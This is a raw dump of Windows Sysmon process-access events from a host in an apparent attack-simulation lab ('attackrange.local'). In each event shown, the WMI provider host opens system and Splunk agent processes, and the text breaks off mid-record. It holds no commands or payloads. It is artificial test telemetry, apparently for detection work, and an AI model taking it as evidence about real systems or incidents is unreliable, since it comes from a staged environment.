16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.644{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program 